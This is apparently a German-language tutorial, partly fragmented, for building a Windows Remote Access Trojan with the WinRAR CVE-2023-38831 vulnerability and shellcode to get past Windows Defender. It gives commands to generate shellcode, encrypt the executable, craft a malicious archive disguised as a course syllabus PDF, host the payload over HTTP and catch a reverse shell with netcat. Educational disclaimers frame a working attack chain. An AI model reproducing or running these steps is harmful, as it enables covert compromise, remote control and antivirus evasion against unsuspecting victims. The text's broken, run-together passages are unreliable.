
Remote Access Trojan (RAT) für Windows x64 unter Verwendung einer Kombination aus der Schwachstelle CVE-2023-38831 (WinRAR < 6.23 Schwachstelle) und Shellcode-Ausnutzungstechnik.
Entwicklung eines Windows x64 RAT unter Verwendung von CVE-2023-38831 (WinRAR < 6.23) und Shellcode-Ausnutzung zur Umgehung von Windows Defender.
Warnung: Diese Informationen dienen ausschließlich Bildungszwecken. Unautorisierte Nutzung dieser Techniken ist illegal und unethisch.
Shellcode erstellen
51721.py, um den initialen Shellcode zu generieren.Shellcode modifizieren und kompilieren
Ausführbare Datei verschlüsseln
decrypt_file.ps1, um die kompilierte ausführbare Datei zu verschlüsseln:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
WinRAR-Archiv erstellen
cve-2023-38831-exp-gen.py, um das Archiv zu erstellen:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Python-Server für Dateidownload einrichten
enc_main.exe und decrypt_file.ps1 enthält.python3 -m http.server 8000
Vorbereitung zum Lauschen auf die Reverse-TCP-Shell
nc -lnvp 4444
Reverse-TCP-Shell auslösen
Diese Informationen werden ausschließlich zu Bildungszwecken bereitgestellt. Die Nutzung dieses Exploits ohne ausdrückliche Erlaubnis ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieser Informationen.